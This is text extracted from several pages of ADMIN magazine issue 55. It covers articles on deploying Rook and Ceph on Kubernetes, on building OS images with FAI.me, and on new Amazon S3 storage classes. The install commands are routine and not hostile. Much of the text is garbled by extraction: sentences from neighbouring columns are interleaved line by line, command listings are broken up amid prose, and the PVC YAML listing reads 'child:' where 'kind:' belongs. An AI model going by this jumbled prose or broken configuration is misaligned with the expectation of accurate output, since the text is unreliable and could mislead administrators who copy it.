on five servers that form a Kubernetes starts the run time, which is now
instance. available for use by Kubernetes. [ ... Preconditions ... ]
If you don’t have physical hardware Working as an admin user, you need # apt-get update
# apt-get install software-properties-common
at hand, you can alternatively work to perform these steps on all the serv-
# add-apt-repository ppa:projectatomic/ppa
through this example with virtual ers, not just on the Control Plane or
# apt-get update
machines (VMs); note, however, that the future Kubelet servers.
Ceph will take possession of the hard [ ... Install CRI-O ... ]
drives or SSDs used later. Five VMs Next Steps # apt-get install cri-o-1.13
on the same SSD, which then form
a Kubernetes cluster with Rook, are Next, complete the steps in Listing 2
probably not optimal, especially if to add the Kubernetes tools kubelet, Listing 2: Installing Kubernetes
you expect a longer service life from kubeadm, and kubectl to your systems. # apt-get update && apt-get install -y
the SSD. In any case, Ceph needs at Thus far, you have only retrieved the apt-transport-https curl
least one completely empty hard disk components needed for Kubernetes # curl -s https://packages.cloud.google.com/apt/doc/
in every system, which can later be and still do not have a running Ku- apt-key.gpg | apt-key add -
used as a data silo. bernetes cluster. Kubeadm will install # cat <<EOF >/etc/apt/sources.list.d/kubernetes.list
this shortly. On the node that you deb https://apt.kubernetes.io/ kubernetes-xenial main
EOF
Control Plane Node have selected as the Control Plane,
# apt-get update
the following command sets up the
# apt-get install -y kubelet kubeadm kubectl
Of five servers with Ubuntu 18.04 required components:
# apt-mark hold kubelet kubeadm kubectl
LTS, pick one to serve as the Kuber-
netes master. For the example here, # kubeadm init U
the setup does without any form of --pod-network-cidr=10.244.0.0/16 As a Kubernetes admin, you can-
classic high availability. In a produc- not avoid the network. Although
tion setup, any admin would handle The --pod-network-cidr parameter is not nearly as complicated as with
this differently so as not to lose the not strictly necessary, but a Kuber- OpenStack, for which an entire
Kubernetes controller in case of a netes cluster rolled out with kubeadm software-defined networking suite has
problem. needs a network plugin compatible to be tamed, you still have to load a
On the Kubernetes master, which with the Container Network Interface network plugin: After all, containers
is referred to as the Control Plane standard (more on this later). First, without a network don’t make much
Node in Kubernetes-speak, ports you should note that the output from sense.
6443, 2379-2380, 10250, 10251, and kubeadm init contains several com- The easiest way to proceed is to use
10252 must be accessible from the mands that will make your life easier. Flannel [4], which requires some ad-
outside. Also, disable the swap In particular, you should make a note ditional steps. On all your systems,
space on all the systems; otherwise, of the kubeadm join command at the run the following command to route
the Kubelet service will not work re- end of the output, because you will IPv4 traffic from bridges through
liably on the target systems (Kubelet use it later to add more nodes to the iptables:
is responsible for communication cluster. Equally important are the
between the Control Plane and the steps used to create a folder named # sysctl U
target system). .kube/ in your personal folder, in net.bridge.bridge-nf-call-iptables=1
which you store the admin.conf file.
Install CRI-O Doing so then lets you use Kuber- Additionally, all your servers need
netes tools without being root. Ide- to be able to communicate via ports
To run Kubernetes, the cluster sys- ally, you would want to carry out this 8285 and 8462. Flannel can then be
tems need a container run time. Until step immediately. integrated on the Control Plane:

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 31
TO O L S Rook

How Ceph Works


To help understand how Rook is deployed in the multiplies every piece of uploaded information If a Ceph cluster splits into several parts (e.g.,
overall context of Ceph (Figure 1), I will review as often as the administrative policy defines. a switch fails), you would otherwise be in dan-
only the most important details here. Moreover, RADOS has self-healing capabilities. ger of uncoordinated write operations on the
Ceph is based on the principle of object stor- For example, if a single hard disk or SSD fails, individual partitions of the cluster. This split-
age. It treats any content that a user uploads RADOS notices and creates new copies of the brain scenario is a horror story for any storage
to Ceph as a binary object. Advantageously, lost objects in the cluster after a configurable admin, because it always means you have to
objects can be separated, distributed, and reas- tolerance time. discard the entire cluster database. After do-
sembled at will, as long as everything happens At least two services run under the RADOS hood: ing so, you can only import the latest backup.
in the correct order. In this way, object storage Object storage daemons (OSDs) and monitoring However, Ceph clusters are typically no longer
bypasses the limitations of traditional block servers (MONs). OSDs are the storage silos in
completely backed up because of their size, so
storage devices, which are always inextricably Ceph. These block devices store the user data.
recovery from a backup would also be prob-
linked to the medium to which they belong. More than half of the MON guard dogs must
lematic if worst came to worst.
The object store at the heart of Ceph is RADOS, always be active and working in the cluster; in
which implicitly provides redundancy and this way, the cluster can achieve a quorum. CephFS
Out of the box, Ceph offers three front ends for
client access. The Ceph block device supports
access to a virtual hard disk (image) in Ceph
as if it were a block device and can be imple-
mented with either the Linux kernel module
RBD or by Librbd in userspace.
Another option envisages access through a
REST interface, similar to Amazon S3. Pre-
cisely this protocol is supported by Ceph’s
REST interface, the Ceph Object Gateway – in
addition to the Swift OpenStack protocol.
What RBD and Ceph Object Gateway have in
common is that they get along with the OSDs
and MONs in RADOS.
The situation is different with the CephFS
POSIX filesystem, for which a third RADOS
service is required: the metadata server
(MDS), which reads the POSIX metadata
stored in the extended user attributes of the
Figure 1: Ceph offers several interfaces, including a block device, a REST interface, and objects and delivers the data directly to its
a POSIX filesystem. © Inktank clients as a cache.

# kubectl apply U to get up and running as Kubernetes. In other words, by applying the
-f https://raw.githubusercontent.com/ U Before doing so, however, it makes ready-made Rook definitions from
coreos/flannel/U sense to review the basic architecture the Rook Git repository to your Ku-
2140ac876ef134e0ed5af15c65e414cf26827915/ U of a Ceph cluster. Rolling out the bernetes instance, you automatically
Documentation/kube-flannel.yml necessary containers with Rook is not create a Rook cluster with a working
rocket science, but knowing what is Ceph that utilizes the unused disks
This command loads the Flannel defi- actually happening is beneficial. on the target systems.
nitions directly into the running Ku- To review the basics of Ceph and how Experienced admins might now
bernetes Control Plane, making them it relates to Rook, see the box “How be thinking of using the Kuber-
available for use. Ceph Works.” netes Helm package manager for a
To roll out Rook (Figure 2) in fast rollout of the containers and
Rolling Out Rook Kubernetes, you need OSDs and solutions. However, it would fail
MONs. Rook makes it easy, because because Rook only packages the op-
As a final step, run the kubeadm join the required resource definitions can erator for Helm, but not the actual
command (generated previously by be taken from the Rook source code cluster.
kubeadm init), which runs the com- in a standard configuration. Custom Therefore, your best approach is to
mand on all nodes of the setup except Resource Definitions (CRDs) are check out Rook’s Git directory locally
the Control Plane. Kubernetes is now used in Kubernetes to convert the (Listing 3). In the newly created
ready to run Rook. local hard drives of a system into ceph/ subfolder are two files worthy
Thanks to various preparations by OSDs without further action by the of note: operator.yaml and cluster.
Rook developers, Rook is just as easy administrator. yaml. (See also “The Container Stor-

32 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
Rook TO O L S

Listing 3: Applying Rook Definitions


# git clone https://github.com/rook/rook.git
# cd rook/cluster/examples/kubernetes/ceph
# kubectl create -f operator.yaml
# kubectl get pods -n rook-ceph-system
# kubectl create -f cluster.yaml

Listing 4: PVC for Kubernetes


01 child: PersistentVolumeClaim
02 apiVersion: v1
03 metadata:
04 name: lm-example-volume-claim
05 spec:
06 storageClassName: rook-block
07 accessModes:
08 - ReadWriteOnce
Figure 2: Rook sits between Ceph and Kubernetes and takes care of Kubernetes
09 resources:
administration almost completely automatically. © Rook
10 requests:
11 storage: 10Gi
age Interface” box.) With kubectl, Integrating Rook and
first install operator, which enables Kubernetes
the operation of the Ceph cluster in working directory, after performing
Rook. The kubectl get pods command Some observers claim that cloud com- the above steps, you will find a stor-
lets you check the rollout to make puting is actually just a huge layer ageclass.yaml file. In this file, replace
sure it worked: The pods should be cake. Given that Rook introduces an size: 1 with size: 3 (Figure 3).
set to Running. Finally, the actual additional layer between the contain- In the next step, you use kubectl to
Rook cluster is rolled out with the ers and Ceph, maybe they are not create a pool in Ceph. In Ceph-speak,
cluster.yaml file. that wrong, because to be able to use pools are something like name tags
A second look should now show that the Rook and Ceph installation in for binary objects used for the inter-
all Kubelet instances are running Kubernetes, you have to integrate it nal organization of the cluster. Basi-
rook-ceph-osd pods for the local hard into Kubernetes first, independent of cally, Ceph relies on binary objects,
drives and that rook-ceph-mon pods the storage type provided by Ceph. If but these objects are assigned to
are running, but not on any of the you want to use CephFS for storage, it placement groups. Binary objects be-
Kubelet instances. Out of the box, requires different steps than if you are longing to the same placement group
Rook limits the number of MON pods using the Ceph Object Gateway. reside on the same OSDs.
to three because that is considered The classic way of using storage, Each placement group belongs to a
sufficient. however, has always been block de- pool, and at the pool level the size
vices, on which the example in the parameter determines how often each
The Container Storage Interface next step is based. In the current individual placement group should be
Kubernetes is still changing fast – not least
because many standards around container
solutions are just emerging or are now
considered necessary. For some time, the
Container Storage Interface (CSI) standard
for storage plugins has been in place. CSI is
now implemented throughout Kubernetes,
but many users simply don’t use it yet.
The good news is that CSI works with Rook.
The Rook examples also include an oper-
ator-with-csi.yaml file, which you can
use to roll out Rook with a CSI connection
instead of the previously mentioned opera-
tor.yaml. In the ceph/csi/ folder of the
examples you will find CSI-compatible vari-
ants for the Ceph block device and CephFS,
instead of the non-CSI variants used here. If
you are rolling out a new Kubernetes cluster
with Rook, you will want to take a closer Figure 3: When creating a storage class in production for the Ceph Object Gateway, you
look at CSI.
should change size to 3.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 33
TO O L S Rook

# kubectl create -f toolbox.yaml


# kubectl -n rook-ceph exec U
-it $(kubectl -n rook-ceph get pod U
-l "app=rook-ceph-tools" U
-o jsonpath=U
'{.items[0].metadata.name}') bash

The usual Ceph commands are now


available. With ceph status, you can
check the status of the cluster; ceph
osd status shows how the OSDs are
currently getting on; and ceph df
checks how much space you still have
in the cluster. This part of the setup is
therefore not specific to Rook.

Conclusions
Figure 4: When creating the storage class for CephFS, you again need to change the size
parameter from 1 to 3 for production. Rook in Kubernetes provides a quick
and easy way to get Ceph up and run-
replicated. In fact, you determine the to 3 for both dataPools and metadata- ning and use it for container work-
replication level with the size entry Pool (Figure 4). loads. Unlike OpenStack, Kubernetes
(1 would not be enough here). The To create the custom resource defini- is not multiclient-capable, so the
mystery remains as to why the Rook tion for the CephFS service, type: “one big Ceph for all” approach is
developers do not simply adopt 3 as far more difficult to implement than
the default. kubectl create -f filesystem.yaml with OpenStack. For this reason, ad-
As soon as you have edited the file, mins tend to roll out many individual
issue the create command; then, dis- To demonstrate that the pods are now Kubernetes instances instead of one
play the new rook-block storage class: running with the Ceph MDS com- large one. Rook is ideal for exactly
ponent, look at the output from the this scenario, because it relieves the
kubectl create -f storageclass.yaml command: admin of a large part of the work:
kubectl get sc -a maintaining the Ceph cluster.
# kubectl -n rook-ceph get pod U Rook version 1.x [5] is now available
From now on, you have the option -l app=rook-ceph-mds and is considered mature for deploy-
of organizing a Ceph block device ment in production environments.
from within the working Ceph cluster, Like the block device, CephFS can Moreover, Rook is now an official
which relies on a persistent volume be mapped to its own storage class, Cloud Native Computing Foundation
claim (PVC) (Listing 4). which then acts as a resource for Ku- (CNCF) project; thus, it is safe to as-
In a pod definition, you then only bernetes instances in the usual way. sume that many more practical fea-
reference the storage claim (lm-exam- tures will be added in the future. Q Q Q
ple-volume-claim) to make the volume What’s Going On?
available locally. Info
If you are used to working with [1] Rook: [https://rook.io]
Using CephFS Ceph, the various tools that provide [2] “Cloud-native storage for Kubernetes with
insight into a running Ceph cluster Rook” by Martin Loschwitz, ADMIN, issue
In the same directory is the filesys- can be used with Rook, too. How- 49, 2019, pg. 47,
tem.yaml file, which you will need ever, you do need to launch a Pod [http://www.admin-magazine.com/
if you want to enable CephFS in ad- especially for these tools in the form Archive/2019/49/Cloud-native-storage-for-
dition to the Ceph block device; the of the Rook Toolbox. Kubernetes-with-Rook/]
setup is pretty much the same for A CRD definition for this is in the [3] CRI-O: [https://cri-o.io]
both. As the first step, you need to Rook examples, which makes get- [4] Flannel:
edit filesystem.yaml and correct the ting the Toolbox up and running [https://github.com/coreos/flannel]
value for the size parameter again, very easy before connecting to [5] Rook versions: [https://github.com/rook/
which – as you know – should be set Rook: rook/releases]
Q

34 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
CO N TA I N E R S A N D V I RT UA L I Z AT I O N FAI.me

Build operating system images on demand

Assembly Line
If you are looking for a way to build images quickly and easily, FAI.me is the place to go. By Martin Loschwitz

In popular clouds, the providers ages on demand, for both bare metal comes with a pre-installed operating
usually roll out standard distribution and use in the cloud. In this article, system. To take this into account,
images. SUSE, Red Hat, and Canoni- I introduce FAI.me and explain what Lange has implemented FAI.me on
cal offer these explicitly, and there is happens in the background. two subpages on the FAI website for
no reason why you should not use cloud images [3] and bare metal [4].
them. However, these images may Instant Images Both pages are quite straightforward.
have one or two annoying features,
such as missing packages, wrong FAI.me provides the functionality Clouds
configurations, or other everyday dif- of FAI without the kind of tinkering
ficulties. that’s otherwise necessary. Basically, If you look at the cloud page, you
Changing a finished image is not it’s not much more than a graphical only have a few – really important –
trivial. Instead, many admins start web-based interface for fai-diskim- parameters to set. At the very top of
rebuilding from the source and, age, which assembles bootable OS the form, for example, you need to
sooner or later, give up. In most images on demand. Images for bare enter both the target size of the image
cases it is not possible to achieve the metal installations as well as for and its format. The background to
same image quality as that of the clouds are included, but FAI.me offers this is that if you build an image for
distributors. Either the DIY images a whole host of extremely practical AWS, it needs a different format than
Lead Image © Nataliya Hora, 123RF.com

are bulky and far too big or they functions. for KVM, which usually wants the
don’t work well. Naturally, the bootable FAI images for QCOW2 format for hard drives.
This problem is exactly what FAI.me bare metal differ significantly from You can define the hostname, but
addresses: The tool is an extension the cloud images. The one contains it is usually overwritten by the
of the Fully Automated Installer (FAI; the normal FAI installer, which starts software-defined networks in clouds
see also the “FAI Review” box) [1] its work after launching from the boot and their name resolution. Practi-
that builds operating system (OS) im- medium, whereas the cloud version cally, if you add your public SSH key

36 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
FAI.me CO N TA I N E R S A N D V I RT UA L I Z AT I O N

FAI Review
A short review of FAI will help you understand FAI.me. Although FAI is a USB stick. The local boot medium then behaves exactly as a network-
not new, the author Thomas Lange is continuously adding new features. based FAI, but with a few system-related limitations: If you change the
Moreover, a small but hard-working community has gathered around the
FAI configuration, you have to create new images afterward.
tool, keeping it up to date and ensuring that it can install Ubuntu and
In the first years of FAI’s existence, this function was limited to gen-
CentOS in addition to Debian.
The original purpose of FAI was clearly defined: After unpacking, new erating images for bare metal, but now FAI also provides functions for
servers install autonomously to the extent possible and without too building images for cloud environments. Taking Debian as an example,
much manual intervention. Quite remarkably, FAI was created back the command
in the late 1990s, long before automation tools such as Puppet or fai-diskimage -u cloudhost -S900M U
Ansible existed.
-cDEFAULT,DEBIAN,AMD64,FAIBASE,U
FAI offered the ability to roll out an OS automatically at an early stage.
In the standard configuration, it combines a number of different proto- DEMO,GRUB_PC,CLOUD U
cols. A DHCP server is supported by a TFTP server. Clients use the PXE /tmp/disk
protocol to obtain an IP and then load a bootloader via TFTP. A kernel, creates an image of an installed Debian system built for the AMD64
usually one from the installation routine, is responsible for taking care architecture in /tmp/disk; it contains the GRUB bootloader and needs
of the rest.
900MB of storage space (Figure 1). If you have fast Internet access on
The program needs PXE to boot into a custom environment where it can
roll out its various operating systems. Lange and volunteer FAI develop- the system on which you call the fai-diskimage command, the process
ers have implemented many features for this purpose. Scripts can be is also quick. It hardly takes a minute for the finished image to become
executed at different stages of the installation, which then implement available. Debian is happy to have the tool, because, among other things,
certain functions not provided out of the box in FAI. All FAI components the project uses it to create its official images for the cloud [2].
can be loaded from a central network server
for this purpose.
The highlight is that FAI does not depend on
the installation routine of an installer. If you
want to implement automation for SUSE,
CentOS, and Debian, you would theoretically
have to create three boot environments: for
AutoYaST, Kickstart, and preseeding.
FAI offers a mostly generic interface. Only
local modifications, such as the selection of
the packages to be installed automatically,
add pitfalls because not all packages for the
same components have identical names across
distributions.
Lange recognized early on that dependence
on the network can be quite disadvantageous.
Conceivably a DHCP server may exist, but
it then takes some time to integrate with
FAI – or DHCP is not allowed at all. Maybe the
systems you want to install just can’t use PXE
– not all network cards come with support for
this protocol. However, the network boot in
FAI will not work without a network either.
For many years, FAI has supported the pos-
sibility of generating a static image from a
precomposed FAI configuration, which you
can then burn to a CD-ROM or DVD or write to Figure 1: fai-diskimage creates a cloud image based on an existing FAI configuration.

to a cloud image, you don’t have to FAI.me just wants to know which able for use in OpenStack, have man-
specify it when starting the virtual packages it should integrate into the aged with around 260MB for years.
machine. image. Best be economical here: As
If you want to set a password for root, a rule, clouds are connected by fast Bare Metal
you can, but I strongly advise against lines, so it is advisable to keep the
it. Leaving the field empty is one less basic image as small as possible and If you want to build an image for use
attack vector, and it doesn’t mean hav- load the rest off the network or a lo- on bare metal instead, the effort is not
ing to do without root rights thanks to cal mirror as needed. much greater. Although a separate op-
sudo. If you then set the desired lan- The big distributors demonstrate this tion displays the advanced settings, it
guage and the release you want to use, vividly. The Ubuntu images, for ex- only takes you to the settings for the
you are virtually ready to start. ample, which Canonical makes avail- root password and lets you add a pub-

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 37
CO N TA I N E R S A N D V I RT UA L I Z AT I O N FAI.me

lic SSH key. FAI assumes by default that maining settings largely correspond to bottom left for creating the image
it will create a user with a password, those of the cloud variant. is all it takes to start the automatic
who then becomes root with sudo. image building process (Figures
You can specify the partition scheme Push-Button Image 2 and 3). After a short wait, the
in a drop-down menu. FAI.me pro- browser then starts downloading the
vides several suggestions for the use Whether you want an image for bare image, which can then be used on a
of the Logical Volume Manager or / metal or for the cloud, at the end of USB stick, on a CD/DVD, or in the
home on your own partition. The re- the process, pressing the button at cloud.
As mentioned, no hocus-pocus is tak-
ing place in the background; instead,
the web interface calls fai-cd and
fai-mirror or fai-diskimage behind
the scenes and creates a matching
image on the fly. Therefore, you can
be absolutely sure that you always
get the packages for the latest Debian
GNU/Linux.
Unlike the big distributors, you decide
when to build the image, although
it means not using an official image,
but one you build yourself with FAI.
me. What Lange originally intended
as a showcase for FAI and to give us-
ers an understanding of FAI’s range of
functions is itself a very practical tool.

Your Own Image Factory


To recap, FAI.me has virtually no
functionality of its own. The tool uses
a preconfigured FAI installation in
the background to build images on
Figure 2: FAI.me creates images for the cloud in QCOW2 or AWS format or … demand in line with FAI standards,
which is the solution to a problem
that many cloud providers face. Pre-
built cloud images are fine, but some-
times you need local modifications.
If you offer special hardware in your
cloud and want to pass it through to
your users, you find yourself regularly
building your own images.
As explained in the “Images or Au-
tomation?” box, this question is not
trivial, especially if you don’t have
the right toolset at hand. FAI and FAI.
me, on the other hand, have proven
to be very useful tools that can
quickly form the basis of a local im-
age factory that automatically outputs
state-of-the-art disk images with spe-
cial local modifications.

How It Works
To begin, you first set up FAI as if you
wanted to use it for the live installa-
Figure 3: … installation images that equip a physical host with an operating system. tion of nodes. Factors like DHCP can

38 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
FAI.me CO N TA I N E R S A N D V I RT UA L I Z AT I O N

be ignored – the purpose is to create and this is exactly what the Debian particular, is not difficult to set up if
bootable media. After that, you al- project does. It stores its FAI con- you make sure that GitLab has a vir-
ready have the option to create your figuration in Debian GitLab and uses tual machine on which FAI is execut-
own images with fai-cd and fai-dis- hooks to wire it to an FAI installa- able and that can access the GitLab
kimage. But that’s only half the battle. tion in such a way that the described repository itself to build images ac-
Users actually want to have this file mechanism is implemented. When cording to FAI rules.
embedded in a CI/CD process to en- a commit ends up in the master Instead of laboriously developing an
sure that images are automatically branch of the repository, GitLab then image factory yourself, it could be a
built when changes are made to the ensures that new images are created good idea to turn to FAI, especially
FAI configuration and that the images automatically. if the target system is Debian, with
are then available for download from If you prefer not to overwrite the old which FAI is particularly connected
a central location. images automatically, the recommen- through its author.
Therefore, connecting FAI to a CI/CD dation is to encode the date in the
tool such as Jenkins is a good idea, name. The example with GitLab, in Conclusions
Images or Automation? For many admins, building operating
On the basis of my own experience, FAI.me Linux on your hard disk with AutoYaST, Kick- system images is an unnecessarily
triggers two reactions that could hardly be start, the Debian preseeding method, or what- complicated exercise that requires
more different. On the one hand, enthusiastic ever your distribution uses as an automatic a huge amount of preparation. FAI
admins have needed a tool like this and had installation tool. According to this narrative, shows another way: By combin-
not yet found it. On the other hand, more con- then, the automation engineer handles the ing the appropriate parameters for
ventional admins with backgrounds in automa- rest of the work. fai-diskimage or fai-cd and fai-mir-
tion have turned up their noses.
However, this problem is easy to work around: ror, it builds generic disk images at
A conflict comes to light that plays an impor-
Continuous integration and continuous deliv- the command line in a very short
tant role in contemporary IT. Does it make
ery/deployment (CI/CD) environments based time.
more sense to work with operating system
images, or should you instead rely on the on Jenkins offer the ability to build OS images However, FAI itself cannot be set up
vendor’s installation tools and use automation completely automatically. Of course, FAI.me is easily and quickly. Anyone planning
to make the required adjustments? Although also an approach to circumventing precisely to install dozens, hundreds, or even
this discussion is undoubtedly still in full sway, the problem described. If you use FAI.me to thousands of systems automatically
many assumptions and fears are based on build your images, you can understand the with this solution will be happy to
obsolete knowledge. process in detail, and if you so desire, you put up with the overhead of the initial
Admins are absolutely right when they warn can also run FAI.me in an instance of its own, FAI installation: It’s guaranteed to pay
against monster images that cannot be re- which then contains local modifications – but dividends. Each new server that is
generated when you need them. Companies in a comprehensible way. installed in this way then reduces the
commonly find that a golden master image for The images built with FAI.me can just as easily total overhead and pays for itself.
the installation of new systems has “grown
be frugal operating system images that simply If you just want a sample of the FAI
historically”: It works, but nobody in the
prepare a host for use with Puppet, Ansible, atmosphere, FAI.me is the right place
company knows exactly what it contains. When
or some other automation system. By the to start. In a very short time, you
a new image has to be built, it often involves
massive overhead and consumes a huge way, this is more elegant by several orders can build disk images for Debian
amount of time. of magnitude than the automation structures that still offer some leeway for local
The same applies to images you can pick up that some administrators build themselves customizations. FAI.me is therefore a
from alternative “black box” sources from with scripting in Kickstart or AutoYaST or by very useful extension to FAI itself and
the Internet. One thing you do not want in preseeding. worth exploring. Q
your data center is a pre-owned image with a One thing should be clear by now: Nothing
built-in Bitcoin miner, although this is mostly works without operating system images. Info
discovered in the context of container images. They are essential in clouds because virtual [1] “Automatically install and configure sys-
However, the same caveat naturally also ap- instances cannot be built and started without tems” by Martin Loschwitz, ADMIN, issue
plies to images of entire operating systems. them. Installers from distributions are simply
By the way, when many admins think of im- 52, 2019, pg. 62:
not viable alternatives, because the current [http://www.admin-magazine.com/
ages, they think of bare metal deployments.
clouds do not support the PXE boot functional- Archive/2019/52/Automatically-install-and-
Because the local variance in this area is much
ity required in the first place. configure-systems]
higher than in defined environments such as
KVM or VMware, many people in the past be- In the end, as is often the case, a whole range [2] Debian cloud images: [https://salsa.debian.
lieved that monster images were legitimate or of gray tones exist, and those admins who find org/cloud-team/debian-cloud-images]
even necessary. a perfect mix of images on the one hand and
[3] FAI.me for cloud images:
Like with a pendulum, a countermovement automation on the other, will have a pleasing
[https://fai-project.org/FAIme/cloud]
of tinkerers categorically reject OS images. result. FAI.me is a promising and well-proven
[4] FAI.me for installation images:
Instead, its proponents say you should install component in such a context.
[https://fai-project.org/FAIme]

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 39
CO N TA I N E R S A N D V I RT UA L I Z AT I O N New S3 Services at Amazon

New storage classes for Amazon S3

Class Society
Each Amazon storage class addresses a different usage profile; we examine the new classes to help you make
the right choice. By Thomas Drilling

AWS introduced several new storage So, if you know the most common under its Amazon S3 Service Level
services and databases at re:Invent access patterns to your data stored Agreement [1]. By the way, such a
2018, including new storage classes for in S3, you can optimize costs by service is by no means available for
Amazon Simple Storage Service (S3). intelligently choosing the right stor- all AWS services.
In the meantime, new releases (S3 age class. The new S3 Intelligent-Tiering
Intelligent-Tiering and S3 Glacier Deep memory class also has a stability of
Archive) have become available that High-Availability SLAs 99.999999999 percent with an avail-
quickly boost the number of storage ability of 99.9 percent, just as in the
classes in the oldest and most popular The individual storage classes differ S3 Standard-IA class. In the case of
of all AWS services from three to six. in terms of availability and durabil- the S3 One Zone-IA storage class,
In this article, I present the newcomers ity. Because AWS generally replicates however, replication only takes place
and their characteristics. data within a region (with the excep- within a single availability zone,
Amazon’s Internet storage has al- tion of the S3 One Zone-IA class) resulting in reduced availability of
ways supported storage classes, be- across all availability zones, Amazon 99.5 percent. Replication beyond re-
tween which users can choose when S3 is basically a simple, key-based gions does not take place in AWS to
uploading an object and which object store. Amazon S3, for exam- improve further availability or con-
Lead Image © stillfix, 123RF.com

they can also switch automatically ple, offers 99.99 percent availability sistency, because this would contra-
later using lifecycle guidelines. The in the standard storage class and dict the corporate philosophy with
individual storage classes have dif- 99.99999 percent permanence, which regard to data protection. However,
ferent price models and availability means that of 10,000 stored files, one the user can configure automatic
classes, each of which optimally file is lost every 11 million years, on replication to another region in S3 if
addresses a different usage profile. average. AWS even guarantees this so desired.

42 A D M I N 55 W W W. A D M I N - M AGA Z I N E .CO M
New S3 Services at Amazon CO N TA I N E R S A N D V I RT UA L I Z AT I O N

Table 1: Current S3 Memory Classes


Storage Class Suitable for Resistance (%) Availability (%) Availability Zones
Standard Data with frequent access 99.999999999 99.99 Ƣ3
Standard-IA Long-term data with irregular access 99.999999999 99.9 Ƣ3
Intelligent-Tiering Long-term data with changing or unknown 99.999999999 99.9 Ƣ3
access patterns
One Zone-IA Long-term, non-critical data with fairly 99.999999999 99.5 1
infrequent access
Glacier Long-term archiving with recovery times 99.999999999 99.99 (after restore) Ƣ3
between minutes and hours
Glacier Deep Archive Data archiving for barely used data with a 99.999999999 99.99 (after restore) Ƣ3
recovery time of 12 hours
RRS (no longer recommended) Frequently retrieved, but non-critical data 99.99 99.99 Ƣ3

Comparison of Storage data returned by S3 is charged at For this automation, however, AWS
$0.0007/GB, all data scanned at charges an additional monthly moni-
Classes
$0.002/GB. Lifecycle transition and toring and automation fee per object.
Although S3 has made do with retrieval requests are free, as are Specifically, S3 Intelligent-Tiering
three memory classes – Standard, DELETE and CANCEL requests. monitors the access patterns of the
Standard-IA, and Glacier – for many Q The price of S3 storage manage- objects and moves objects that have
years, three additional memory ment depends on the functions not been accessed for 30 days in suc-
classes are now available: Intelligent- included. For example, S3 object cession to Standard-IA. If an object
Tiering, One Zone-IA, and Glacier tagging costs $0.01/10,000 tags per in Standard-IA is accessed, AWS
Deep Archive, all with a durability of month. automatically moves it back to S3
99.999999999 percent. The documen- Q For outgoing transmissions, AWS Standard. There are no retrieval fees
tation still also lists the Standard with allows up to 1GB/month free of when using S3 Intelligent-Tiering and
Reduced Redundancy (RRS) storage charge. The next 9.999TB/month no additional grading fees are charged
class with a stability of 99.99 percent. is charged at $0.09/GB, the next when objects switch between access
Currently, AWS does not recommend 40TB/month at $0.085/GB, the levels. This makes the class particu-
the use of RRS – originally intended next 100TB/month at $0.07/GB, larly suitable for long-term data with
for non-critical, reproducible data and the next 150TB/month at initially unknown or unpredictable
such as thumbnails – because the $0.05/GB. access patterns.
standard storage class is now cheaper A complete price overview can be
anyway. As Table 1 shows, the inclu- found on the S3 product page [2]. Assigning Storage Classes
sion of RRS would mean that there
are seven storage classes. S3 with Intelligent S3 storage classes are generally con-
figured and applied at the object
Gradation level, so the same bucket can contain
Amazon S3 Costs
The new Intelligent-Tiering memory objects stored in S3 Standard, S3
Apart from the fact that prices for class is primarily designed to op- Standard-IA, S3 Intelligent-Tiering,
all AWS services generally vary be- timize costs. This approach works or S3 One Zone-IA. Glacier Deep Ar-
tween regions, S3 storage has four because AWS continuously analyzes chive, on the other hand, is a service
cost drivers: storage (storage prices), the data for access patterns and in its own right. Users can upload
retrieval (retrieval prices), manage- automatically transfers the results objects to the storage class of their
ment (S3 storage management), and to the most cost-effective access choice at any time or use S3 lifecycle
data transfer, where moving data to level. The two target memory classes guidelines to transfer objects from
the cloud does not cost anything. In involved in intelligent tiering are S3 Standard and S3 Standard-IA to
US East regions, for example, the S3 Standard and Standard-IA. As you S3 Intelligent-Tiering. For example, if
Standard storage class pricing (in may know, storage is cheaper in the user uploads a new object into a
early 2020) looks like this: Standard-IA, but retrieval is more bucket via S3 GUI, they can simply
Q Storage price is $0.023/GB for the expensive. Although retrieval is pos- select the desired storage class with
first 50TB. sible at any time with the same ac- the mouse (Figure 1).
Q Retrieval price is $0.005/1,000 cess time and latency, the AWS pric- When uploading from the CLI, the
PUT, COPY, POST, or LIST requests ing for this memory class stipulates memory class is given as a parameter,
and $0.0004/1,000 for GET, SE- that the objects are rarely read after --storage-class. The values STANDARD,
LECT and all other requests. All the initial write. REDUCED_REDUNDANCY, STANDARD_IA, ONE-

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 55 43
CO N TA I N E R S A N D V I RT UA L I Z AT I O N New S3 Services at Amazon

trieval order by way of the API, which


eventually returns an archive from
a vault. Like S3, the Glacier API is
natively supported by numerous third-
party applications.
However, one special feature of S3
and Glacier is that the archive service
can also be controlled with a lifecycle
guideline from the S3 API (Figure 2).
Glacier can therefore be controlled
either with the Glacier API or the
S3 API. In the context of S3 lifecycle
policies, for example, it has long been
possible to transfer documents that
are no longer read after a certain pe-
riod of time but must be retained for
a specific period because of corporate
Figure 1: When uploading data to S3, the storage class can be selected via the user compliance guidelines to Glacier af-
interface. ter the desired retention period in S3
Standard-IA.
ZONE_IA, INTELLIGENT_TIERING, GLACIER, Boto3 SDK) to the infrequently ac- Glacier Deep Archive has only been
and DEEP_ARCHIVE are permitted, for cessed storage class (Standard IA) available as a storage class for S3
example: would look like: since early 2019. Since then, users
have been able to archive objects
aws s3 cp s3://mybucket/Test.txt U import boto3 from S3 Standard, S3 Standard-IA,
s3://mybucket2/ U s3 = boto3.resource('s3') or S3 Intelligent-Tiering not only in
--storage-class STANDARD_IA s3.ObjectU S3 Glacier, but also in Glacier Deep
('mybucket', 'hello.txt').put(U Archive. Although storage in Glacier
The same idea applies when using the Body=open('/tmp/hello.txt', 'rb'), U is already three times cheaper than in
REST API. Remember that Amazon StorageClass='STANDARD_IA'U S3 Standard, at less than a half a cent
S3 is a REST service. Users can send ) per gigabyte, the price in Glacier Deep
requests to Amazon S3 either directly Archive again drops to $0.00099/GB
through the REST API or, to simplify Cheap Storage with Glacier per month.
programming, by way of wrapper This pricing should make Glacier
libraries for the respective AWS SDKs
Deep Archives Deep Archive the preferred storage
that encapsulate the underlying Ama- Of the six main storage classes men- class for all companies needing to
